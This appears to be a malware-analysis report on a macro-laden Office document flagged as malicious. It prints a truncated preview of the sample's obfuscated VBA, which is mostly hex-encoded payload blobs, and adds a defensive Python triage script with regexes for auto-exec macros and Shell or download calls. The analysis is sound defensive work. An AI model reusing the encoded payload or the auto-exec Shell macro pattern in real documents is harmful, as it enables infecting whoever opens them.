Risk Score: 264 (MALICIOUS)
Malware Insights
MITRE ATT&CK: T1059.005 Command and Scripting Interpreter: Visual Basic; T1204.002 User Execution: Malicious File
The sample contains VBA macros with both Document_Open and Workbook_Open auto-execution procedures, so the code runs as soon as the document is opened with macros enabled. The critical OLE_VBA_SHELL heuristic indicates a Shell() call in the VBA code, the usual primitive for launching a downloaded or decoded second-stage payload. The carved source (reported as macros.bas, the name the olevba extractor assigns to recovered VBA source, not a file name taken from inside the sample) is 19,907 bytes and consists largely of long hex-string literals, consistent with a payload that is decoded at runtime; the truncated preview ends before any Shell() call site. Note that the module attributes (VB_Name "ThisDocument", VB_Base "1Normal.ThisDocument") describe a Word document class module, while the ClamAV name Xls.Malware.Cwsp-6735643-0 and the Workbook_Open heuristic point at Excel: the sample carries both auto-exec entry points. The ClamAV detection applies to the container file; the carved macro source itself has no ClamAV hit, which only means the signature does not also fire on the decoded text.
Heuristics (8)

- ClamAV: Xls.Malware.Cwsp-6735643-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Xls.Malware.Cwsp-6735643-0
- VBA macros detected [medium, 4 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA [critical] OLE_VBA_SHELL: Shell() call in VBA
- Document_Open macro [high] OLE_VBA_DOCOPEN: Document_Open macro
- Workbook_Open macro [high] OLE_VBA_WBOPEN: Workbook_Open macro
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download or object-execution tokens. This catches p-code-only documents and documents whose source extraction fails, where no visible source is available. Because the VBA runtime normally executes the p-code, this is also the check that survives VBA stomping, where the source stream is blanked or replaced and only the p-code carries the real logic.
- Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the OOXML DrawingML XML namespace identifier found in ordinary Office files; it is not a network indicator and should not be treated as a contact address.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 19907 bytes |

SHA-256: 6d7c1d47dea8432fd3eb669e51c2f08d679b0102df230ebb567535acc63083c6

Detection: ClamAV: No threats found (on the carved source; the Xls.Malware.Cwsp-6735643-0 detection above is on the container file).

Obfuscation or payload: likely. The carved artifact contains 73 long base64-like blob(s). The literals visible in the preview consist of hex digits only and have even length; since the hex alphabet is a subset of the base64 alphabet, "base64-like" here means hex-encoded bytes. The decoded bytes repeat 0x7D heavily, which suggests a simple per-byte transform (XOR or add with a constant) over a payload rather than compressed or encrypted data; the decoding routine is not in the visible preview.
Preview script (first 1,000 lines of the extracted script)

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Public Sub KM_Q()
Dim KY_AQ As String
Dim TJ_RJ As String
Dim W_B As String
W_B = "A77D70527D7D699D8A6C86587D7D7D7DB6A77D7D977D7D7D7D62477D597D7D7D663F7D547D857D955D7D7D607D687DAA567DAA5E4EADA37B7D7D5F7D7D507DAE7D7DA27D7DA07D7A7D3FA257627DA57D7D84417D7B7D7D7DB97D63927D4B6F7F7B7D7D8D7D7D7D6EA54C4989577D9E807D914C7D715E43"
Dim J_A As String
J_A = "7D507B7D5154A281957D7D57B77D8B7D4A9A7D8E7D7DA47DA97D7D4B5B7D567B8E7D7D57407DA1745B7D67947D7D7D657D657D7D7D677D727D7D97887D7D3E7AA5BC467D97507D7D8F7D7D7D6B7D7A7D7D977D57B97D7D7B7D5F7D98569F7D7D675771817D72A853447DA07D47B97D465A8A7D67797D7D"
Dim IIN_RXX As String
IIN_RXX = "7D7D7D4B765D7D7D7D457D7D517D7DA37D7D517D775B72A7AB7D7B7DB1AE7D8096A5A87D646F7DA47DB07D8E7DA8617D79787D7D587D7D7D7D7D72A046BB7D488A7D737D7D7D7D7D7D7D7D7DBB7D587D75737DAC7B7D727DA57D427D7D7D837D7D737D8B7DBB5F65B27D5B7D657D7D8562849F4C7DBC9E"
Dim E_YHD As String
E_YHD = "7DA248937D7D7D7D7D7D887D7D7D7D7D857D477D7D98A84A7D7D7D757DA47D7D668DBD7D7DA8538751A77D7D7D7D727D7D948A7D7D7D7D7D6168A5587DB37D7D7D424E65A94E957D7D837D7D406A7DBCA7437D7B7D7D7D7D7D7D6D7D7D7D7D7D597D7D8462B57D7D607D718AA27D7D7DA47D7D903E725A"
Dim HL_GF As String
HL_GF = "777D7D9246A3527D969C3E75837D957DA57D8E7D7D877E7D7D7D757D7D7D7D4B7A7D7D7DB27D6F5D7D4A7D7D7D5E577D7D7D7D7D7DB17D437DBB6B627D7D7DAA68477D7D7D5C7DA77B7D7D79A85B975E4D467DB48584597D7DA8417D7D9A7DA17D55837D7D7D507D747D53B4504E7D7D7D7D7D7D7DBD52"
Dim LC_VZW As String
LC_VZW = "6F8F587D7D7D7D907D9C91A77158A17D4E697D88957D6D7D7D4B7D7D947DB97DB17D7D7D7D93467D7D76AA7D737D7D8E43BB919F7D7D659860627D7D7D7D5D7D7D7D7D7D477D6167B77D7D7D6E7D7D727D8F7866947D7DA96C7D6E6C7D4B7D567D7D7D7D41B37D7D6D75AB9FA97D7D927D6F7D7D83A764"
Dim TP_W As String
TP_W = "587DB77D7DACAA7D7784857D6E5A93B67D5C5D663E7D7D7D7D607D56727D7D7D7D76787D3E7D7D9C7D937DA65394AA7D65877D58537D7D588A7D7DABA77DAE7D86917D7D7D935D7D74767D7B717D7D7D7D4CBA7D7D7D7D805EB9AD7D997D467D5D7D7D6A3F7D68A07D7D7D7D7D7D7D98637D85B87D687D"
Dim T_R As String
T_R = "7D7D7D7D827D967D7D427C7D4A7DA08F7D7D7D787D7D7D7D3FA17D60966EA27DB87D477D7D9D9C7D98488CB87D7D7D7DA9AFA17D487D637D4595627D7D7DA87D7D7D7D7D7D697D7D7D597D89A67DAC53987D3E45AE7D7D7D7D4577427D7D7D93797D7D7D847D3E6A7DB89D7D7D7D7D7D7D7DB5547D907D"
Dim B_M As String
B_M = "617D7D7D83487D7D7D70A37D82B6B744827DA67D946E7D63997D7D7D5960637D737D607D526E7DAE7D7D7DB77D7D716D7D71887D7DB37D5C8DA6547D7D7D4B7D7DA5937D7D51777D7D957D3E7D7D677D7DB47D7D5BAFA56D7D8C7D68984DB66BB37D558A7D7D5E4F7D7D5B7D5C577D7C927D4D7D707D69"
Dim GIM_PN As String
GIM_PN = "7D647D7D4D7D7D7D4F7D7D7D7D717D7D7D7D87B87D737D7D4372A796806D7D8B7D7D4D7D407D677D7D7D70A59EAF7D8944A7517D7D7D65AC7D617D7DB37D857D7D7D6BA57D6E7D97487D51406F7D7D7D5B8F7D5A817D487D7D7D7DA27D7D7D89B97D7D827E7D7D7D8C7D7D51A97D7D434295A6AC7D9E7D"
Dim G_Q As String
G_Q = "607D51BA7D5E7D7E7D7DAC7D8D897DBA737D7D7D747D727D859C7DB07D7D7DA07D5FBB7D977DAB7DA87D8A7D867D7D7D7D774BA9497D707DBC7D7D6C7DAC7D4A7D6B7D4160B75DA77D8F828E7DA77D7D7D7D7D7D7D73887D7D5A7D9B7DB39F7C7A7D7D7D7D7D7D407D7D7D7D7357936A7D847D53537D7D"
Dim DWK_GL As String
DWK_GL = "9C869AB1497D7D7D4FB5AC5E7D7D7D7D7D7D807D99544D7D46AD7D59AA657DA5AD7DA0B77D7D7D4ABB907D7DA4964DA07D5E7D9A658676B47D40B57E858E7D7D7DA2887DAA7D7D7D8D7D7D5D7D7D547D7D7D4450717E64867D7D6ABB837D3F7CA77D7D7D7DBD6072BD7DB894869F9E7D4C6188B39A847C"
Dim AUN_M As String
AUN_M = "3F7D7D48B09D487D7D7D6D7D607D7D3F7D7DA5B57D8D7D7D7D747D7D7D4A7D7D7D8A7D557D5E7D7DB4577D7C7D755FA47D7D7D7D727D7DB67D7D7D4743556164AA417D957D5A7D7D7D4C5E747D7D7D7D8E70A17D7D8C627D587D7D7D9D7DB77D7D7DB854827E637D8D7D587D7DB37D7DA8BBB179706B3F"
Dim XXN_YBJ As String
XXN_YBJ = "477D7D927D7EB67D7D917D7D8BB57DA7AE7D563E7D64AE43B8744D92B4AE7DAAB64A7D7D7D5B4D4C9D9E7D7D6AB07D7D487D9B533F7AB66D8D8448A6A4B67D71877D7E7D4D7D917D477D3E7D7D448B7D5A7DAA7D7795B57 ... (truncated)
```
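The auto-exec, Shell() and encoded-blob checks that this report's heuristics and its "73 long base64-like blob(s)" count describe can be reproduced on any decoded VBA source. The following Python is an added example written for this page, not the analyzer's or oletools' own code. SAMPLE_VBA is a constructed macro that imitates the sample's shape (hex-string literals plus Word and Excel auto-exec entry points) and is not the sample's macro; the AUTOEXEC and EXEC_TOKENS lists and the 64-character blob threshold are the author's assumptions, not olevba's rules. It goes one step beyond the report by separating even-length hex literals from true base64 and reporting the dominant decoded byte, which is the cue that the blobs sit under a per-byte transform.

```python
"""Static triage of decoded VBA source, modelled on the report's olevba-style
heuristics (auto-exec entry points, Shell()/download tokens, long encoded
string literals). Added example; not the analyzer's or oletools' code.
SAMPLE_VBA is constructed for illustration and is not the sample's macro."""
import re
from collections import Counter

# Procedure names Word/Excel run automatically on open/close (assumed list).
AUTOEXEC = re.compile(
    r"\b(?:Sub|Function)\s+(Document_Open|Workbook_Open|AutoOpen|Auto_Open|"
    r"AutoExec|Document_Close|Workbook_Activate|AutoClose|Auto_Close)\b",
    re.IGNORECASE,
)
# Execution/download primitives a macro needs to stage a payload (assumed list).
EXEC_TOKENS = re.compile(
    r"\b(WScript\.Shell|ShellExecute|Shell|CreateObject|URLDownloadToFileA?|"
    r"XMLHTTP|WinHttpRequest|Run|Exec)\b",
    re.IGNORECASE,
)
# Only long literals are interesting; 64 characters is an assumed threshold.
STRING_LITERAL = re.compile(r'"([^"\r\n]{64,})"')
HEX_ONLY = re.compile(r"^[0-9A-Fa-f]+$")
BASE64_ONLY = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def find_autoexec(src):
    """Names of auto-execution procedures defined in the source."""
    return sorted({m.group(1) for m in AUTOEXEC.finditer(src)}, key=str.lower)


def find_exec_tokens(src):
    """Execution/download tokens anywhere in the source, string literals included."""
    return sorted({m.group(1) for m in EXEC_TOKENS.finditer(src)}, key=str.lower)


def classify_blob(literal):
    """Tell a hex-encoded literal from a base64-like one.

    Hex is a subset of the base64 alphabet, so the hex check must run first;
    a bare 'base64-like' label conflates the two. For hex we also return the
    most frequent decoded byte: one dominant byte across many blobs points at
    a per-byte transform (XOR/add with a constant), not compressed or
    encrypted data, whose byte histogram would be flat."""
    if len(literal) % 2 == 0 and HEX_ONLY.match(literal):
        raw = bytes.fromhex(literal)
        dominant, count = Counter(raw).most_common(1)[0]
        return {"kind": "hex", "dominant": dominant, "dominant_share": count / len(raw)}
    if BASE64_ONLY.match(literal):
        return {"kind": "base64", "dominant": None, "dominant_share": None}
    return {"kind": "other", "dominant": None, "dominant_share": None}


def find_blobs(src):
    """Every long string literal with its classification, in source order."""
    return [dict(length=len(m.group(1)), **classify_blob(m.group(1)))
            for m in STRING_LITERAL.finditer(src)]


def triage(src):
    """Combine the checks the way the report's heuristics do."""
    autoexec = find_autoexec(src)
    tokens = find_exec_tokens(src)
    blobs = find_blobs(src)
    findings = []
    if autoexec:
        findings.append("OLE_VBA_AUTOEXEC: " + ", ".join(autoexec))
    if any(t.lower() in ("shell", "wscript.shell", "shellexecute") for t in tokens):
        findings.append("OLE_VBA_SHELL")
    if blobs:
        findings.append(f"ENCODED_BLOBS: {len(blobs)} long literal(s)")
    verdict = "suspicious" if autoexec and tokens else "info"
    return {"verdict": verdict, "autoexec": autoexec, "tokens": tokens,
            "blobs": blobs, "findings": findings}


# Constructed inputs: a 96-char hex blob with 0x7D as the dominant byte
# (imitating the sample's literals) and a 96-char base64 literal (the
# encoding of "ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890" twice). Not from the sample.
HEX_BLOB = "".join(f"7D7D{b:02X}" for b in range(0x41, 0x51))
B64_BLOB = "QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVoxMjM0NTY3ODkw" * 2

SAMPLE_VBA = f'''Attribute VB_Name = "ThisDocument"
Option Explicit
Public Sub KM_Q()
    Dim W_B As String
    W_B = "{HEX_BLOB}"
    Dim P As String
    P = "{B64_BLOB}"
End Sub
Private Sub Workbook_Open()
    KM_Q
End Sub
Private Sub Document_Open()
    Dim o As Object
    Set o = CreateObject("WScript.Shell")
    o.Run "cmd /c echo constructed", 0
    Shell "calc.exe", vbHide
End Sub
'''

if __name__ == "__main__":
    for line in triage(SAMPLE_VBA)["findings"]:
        print(line)
```

In practice the input is the source olevba prints with `olevba -c <file>`; the report's own macros.bas would be fed in the same way. The hex-first ordering is the point of classify_blob: on literals like the ones in the preview above, a base64 check alone reports "base64-like" and hides that the content is byte-pairs with one value dominating, which is what tells the analyst to look for a single-byte decode loop before trying anything heavier.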